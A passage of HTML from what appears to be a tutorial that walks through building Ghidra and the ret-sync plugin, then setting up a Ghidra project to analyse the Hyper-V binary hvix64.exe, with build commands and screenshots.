vertical-align: baseline;">gradle buildGhidra</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Take the distribution archive from the Ghidra </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">build\dist</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> directory and unpack it:</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; 
text-decoration: none; vertical-align: baseline;">ghidra_9.2_DEV</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">download </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">retsync</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> from </span><a href="https://github.com/bootleg/ret-sync" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://github.com/bootleg/ret-sync</span></a></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p 
dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You can use the compiled version from the ret-sync\ext_ghidra\dist directory or build it yourself with the following command (the complete build instructions are on the same page):</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">cd ext_ghidra</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: 
baseline;">gradle -PGHIDRA_INSTALL_DIR=C:\Github\Ghidra\build\dist\ghidra_9.2_DEV</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In my case I got an error in the Decompiler highlighting class. I simply commented it out. </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">A high-resolution display may need an additional fix. 
Add the following line to support\launch.properties:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">VMARGS_WINDOWS=-Dsun.java2d.uiScale=2</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next you need to create a Ghidra project. 
</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Launch </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Ghidra</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> using ghidraRun.bat</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">2.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span 
face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Import the </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">retsync</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> plugin: File->Install extension, press the green +.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 89px; overflow: hidden; width: 508px;"><img height="89" src="https://lh4.googleusercontent.com/a2N5jXrELJs3mc5LOdBfMydcI-Yqsz7XeNJ0qBdgwZKBLkDcdx5FQWev2NDBraYVSDUNyhGIt739527C0NEQPSQdxBHFPBGP9nJA2dBCy0O2ikpOUKt6B4OiHI8CmHimd049zAjLC0FDeYotXg" style="margin-left: 0px; margin-top: 0px;" width="508" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: 
none; vertical-align: baseline;">Select the zip archive with the </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">retsync</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> plugin:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 195px; overflow: hidden; width: 490px;"><img height="195" src="https://lh6.googleusercontent.com/3Gp0xh_BYYESPdvlKIPM_zTKRS3Wa1XQ7JfpAYXQXhWLXLvcNZRdK5FWAG9EL6renDQTWphrL0pJXOU4p0L1fqbTi05AozxyOlVBTbh-n2L8lGOqrzKEx2MwqzYK3sZf_Gp3Rvu6DvtXTI8Erg" style="margin-left: 0px; margin-top: 0px;" width="490" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; 
font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Press Ok and restart Ghidra.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">3.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">File</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">New project</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. Choose a non-shared project. Set the project directory and project name. 
A folder with the project name and a gpr-file will be created in the project directory (if the folder already exists, you see a message at the bottom).</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 174px; overflow: hidden; width: 428px;"><img height="174" src="https://lh4.googleusercontent.com/drLgBoemIeb2Lypp9fwoESn6NkN8_ucsYinvMB5H-mFNkN78mUDc_Hu1eDx4YxxOlovWCXtJh4SmuEVrRkc1tMj7lTmhxxHqQqAJtoDzJnKtoAKpvIK_tdtVAzs20KvKw4fIcAuVvIlUTyQ8aw" style="margin-left: 0px; margin-top: 0px;" width="428" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">4.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; 
vertical-align: baseline;">Press the </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">CodeBrowser</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> icon. </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 130px; overflow: hidden; width: 94px;"><img height="130" src="https://lh3.googleusercontent.com/xGuLci4YuYKNX8N4vdj0b5lSjQHlIC1y1zhONBJQhNAnUQLT1QkdXYjy6Suvy80BxXq_7n36yNGzI1Lc1O4tMvruF83BO1PYY9jLvVeNM55Jec10qQ8A1cMRzL-jrKB0b_4OFUBDCJ3fGM92Qw" style="margin-left: 0px; margin-top: 0px;" width="94" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You see a message with the </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; 
font-weight: 700; text-decoration: none; vertical-align: baseline;">retsync</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> plugin settings request:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 251px; overflow: hidden; width: 478px;"><img height="251" src="https://lh5.googleusercontent.com/TMA_FPPiKMsst9UJSVS-gMNEgW1cQ-UPu2MDo-G2jLqIR5zVd0EHWw-zW7JfgL5DEeSxoi2zg6kzfXzPmZ-z3wGW8yYY212iWzt5ugBIONSkh_8iGVvSGB1pvl-5YuY-6f4GJaPMAtI2njwBkg" style="margin-left: 0px; margin-top: 0px;" width="478" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">5.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span 
face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Press </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">OK</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, and you see an empty Ghidra project window. Load the hvix64.exe file using </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">File</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Import file</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 187px; overflow: hidden; width: 401px;"><img 
height="187" src="https://lh3.googleusercontent.com/ate6mOhpGQwTzOkGoWtWXWkz7pAmb1U-AE-hGmqxN5jo5CEGvjN-1MkKL5lPb_8Hku0xwrswYZ6WwVzjPt9t7Pa6BUSwv7dJe0b-14TK8kqgVUqq6qFWk5lPjR4CdRPQ8UZkcSATNBv1c1VIlA" style="margin-left: 0px; margin-top: 0px;" width="401" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">6.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Press </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">OK</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. The file will be imported. Next you see a question about analysis. 
Press “Yes”.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 281px; overflow: hidden; width: 390px;"><img height="281" src="https://lh4.googleusercontent.com/saGDLDeXHfa3iDdecS5WRTH-lKELyD-HcYmPnzjsWluJf0zU5WLfFzDk3oaGkEo2zcZ47gLIxkbS94kvwrx6HE0UsQsU_vhwpaYe6QdTLfH2W0pt6dVorE2zX_8Ec8DXKyi2antVdjP6h_HEZA" style="margin-left: 0px; margin-top: 0px;" width="390" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You can try the “Aggressive instruction finder” (the hypervisor contains many different code chunks that are not reached during control-flow graph analysis)</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span 
style="border: none; display: inline-block; height: 120px; overflow: hidden; width: 301px;"><img height="120" src="https://lh5.googleusercontent.com/JlFqQLvgEp5JROhuune0humL6KT7wsb7zOPFngqgn350ulittxBFP00PFr-5jEhx1-iB_SC-X4dWHe17Hzg_vXWJNyn8rUOJzs07HLvakk7YpbdlM3nmmPALPZXyS9tlpTltdNurGpeHcxBGBQ" style="margin-left: 0px; margin-top: 0px;" width="301" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Press </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">OK</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You can see the current progress in the bottom right corner:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: 
normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 38px; overflow: hidden; width: 331px;"><img height="38" src="https://lh4.googleusercontent.com/1UrIM-LFiVG_lKmn_wnTS63wQHIfGP34jagC7d76sbd1hgJFegbla8BdbCRHtABKKhwEhxUJP6CWbmMYmR06BIKX_EQC_qVy-nzCzGgln5waBLazV8SplrpAE-aOkT7a8cu2CZlnWaukxKw2zg" style="margin-left: 0px; margin-top: 0px;" width="331" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">7.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next you see a message about the missing hvix64.pdb file. 
Press Ok – the symbols really are not available (Microsoft does not publish a PDB for hvix64.exe).</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">8.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Press Alt+S to enable </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">retsync</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, and you see the message (ret-sync enable, server listening, server started)</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 113px; 
